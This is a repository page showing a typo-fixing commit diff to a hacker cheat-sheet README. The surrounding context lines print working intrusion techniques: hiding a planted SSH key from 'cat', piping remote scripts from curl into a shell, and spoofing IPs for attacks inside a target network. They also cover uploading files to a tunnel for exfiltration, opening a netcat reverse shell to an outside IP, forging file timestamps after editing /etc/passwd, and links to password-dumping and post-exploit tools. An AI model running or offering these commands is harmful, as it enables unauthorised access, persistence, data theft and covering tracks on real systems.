CalvinBackup/thc-tips-tricks-hacks-cheat-sheet
1
0
Fork 0
mirror of https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git synced 2026-05-23 08:00:00 +02:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #27 from NONVME/spell-checking

Browse Source
This commit is contained in:
skyper
2024-07-22 15:24:20 +01:00
committed by GitHub
parent 21bfbda952 5423346e29
commit f5cde580f0
1 changed files with 14 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+14 -14
View File
@@ -19,7 +19,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Hide a process as root](#hide-a-process-root)
1. [Hide scripts](#hide-scripts)
1. [Hide from cat](#cat)
1. [Execute in parrallel with separate logfiles](#parallel)
1. [Execute in parallel with separate logfiles](#parallel)
1. [SSH](#ssh)
1. [Almost invisible SSH](#ssh-invisible)
1. [Multiple shells via 1 SSH/TCP connection](#ssh-master)
@@ -304,7 +304,7 @@ Note: We use `echo -e` to convert `\\033` to the ANSI escape character (hex 0x1b
Adding a `\r` (carriage return) goes a long way to hide your ssh key from `cat`:
```shell
echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(<authorized_keys)" >authorized_keys
### This adds our key as the first key and 'cat authorized_keys' wont show
### This adds our key as the first key and 'cat authorized_keys' won't show
### it. The $'\r' is a bash special to create a \r (carriage return).
```
@@ -499,7 +499,7 @@ nmap -r -sn -PR 192.168.0.1/24
```
```sh
## ICMP discover computers on the local netowrk
## ICMP discover computers on the local netowork
NET="10.11.0" # discover 10.11.0.1-10.11.0.254
seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1
```
@@ -664,14 +664,14 @@ GS_HOST=213.171.212.212 gs-netcat -i -s ...
<a id="ghost"></a>
**3.vi.c Ghsot IP / IP Spoofing**
Useful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any programm (nmap, cme, ...) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.
Useful on a host inside the target network. This tool re-configured (without trace) the SHELL: Any program (nmap, cme, ...) started from this SHELL will use a fake IP. All your attacks will originate from a host that does not exist.
```sh
source <(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)
```
This also works in combination with:
* [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the taget network.
* [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): Will connect your ROOT Server to the TARGET NETWORK and using a Ghost IP inside the target network.
* [QEMU Tunnels](https://securelist.com/network-tunneling-with-qemu/111803/): As above, but less secure.
---
@@ -1202,7 +1202,7 @@ A list of our [favorite public upload sites](#cloudexfil).
<a id="rsync"></a>
### 4.viii. File transfer - using rsync
Ideal for synchonizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.
Ideal for synchronizing large amount of directories or re-starting broken transfers. The example transfers the directory '*warez*' to the Receiver using a single TCP connection from the Sender to the Receiver.
Receiver:
```posh
@@ -1273,7 +1273,7 @@ On another server:
curl -T file.dat https://example-foo-bar-lights.trycloudflare.com
# Create a directory remotely
curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources
# Create a directory hirachy remotely
# Create a directory hierarchy remotely
find . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}
# Upload all *.c files (in parallel):
find . -name '*.c' | xargs -P10 -I{} curl -T{} https://example-foo-bar-lights.trycloudflare.com/sources/{}
@@ -1334,7 +1334,7 @@ nc -nvlp 1524
After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:
```sh
pwncat -lp 1524
# Press "Ctrl-C" if pwncat gets stuck at "registerd new host ...".
# Press "Ctrl-C" if pwncat gets stuck at "registered new host ...".
# Then type "back" to get the prompt of the remote shell.
```
@@ -1411,7 +1411,7 @@ Variant if *'-e'* is not supported:
```
* On modern shells this can be shortened to `{ nc 3.13.3.7 1524 </dev/fd/2|sh;} 2>&1|:`. (*thanks IA_PD*).
* The `| :` trick wont work on C-Shell/tcsh (FreeBSD), orignal Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.
* The `| :` trick won't work on C-Shell/tcsh (FreeBSD), original Bourne shell (Solaris) or Korn shell (AIX). Use `mkfifo` instead.
Variant for older */bin/sh*:
```sh
@@ -1501,7 +1501,7 @@ exec python -c 'import pty; pty.spawn("/bin/bash")'
...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell:
```sh
# On the target host spwan a PTY using any of the above examples:
# On the target host spawn a PTY using any of the above examples:
python -c 'import pty; pty.spawn("/bin/bash")'
# Now Press Ctrl-Z to suspend the connection and return to your own terminal.
```
@@ -1782,7 +1782,7 @@ Note: Or delete the file and then fill the entire harddrive with /dev/urandom an
<a id="restore-timestamp"></a>
**8.ii. Restore the date of a file**
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modified. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*)
```sh
touch -r /etc/shadow /etc/passwd
@@ -1932,7 +1932,7 @@ fusermount -u .sec
<a id="encrypting-file"></a>
**9.iii Encrypting a file**
Encrypt your 0-Days and log files before transfering them - please. (and pick your own password):
Encrypt your 0-Days and log files before transferring them - please. (and pick your own password):
```sh
# Encrypt
@@ -2159,7 +2159,7 @@ crt() {
| https://archive.org/web/ | Historical view of websites |
| https://www.farsightsecurity.com/solutions/dnsdb/ | DNS search (not free) |
| https://wigle.net/ | Wireless Network Mapper |
| https://radiocells.org/ | Cell Tower Informations |
| https://radiocells.org/ | Cell Tower Information |
| https://www.shodan.io/ | Search Engine to find devices & Banners (not free) |
| https://spur.us/context/me | IP rating `https://spur.us/context/<IP>` |
| http://drs.whoisxmlapi.com | Reverse Whois Lookup (not free) |
@@ -2210,7 +2210,7 @@ Exploits
System Information Gathering
1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information
1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system informations for hackers.
1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system information for hackers.
1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install)
1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system
1. https://github.com/efchatz/pandora - Windows: dump password from various password managers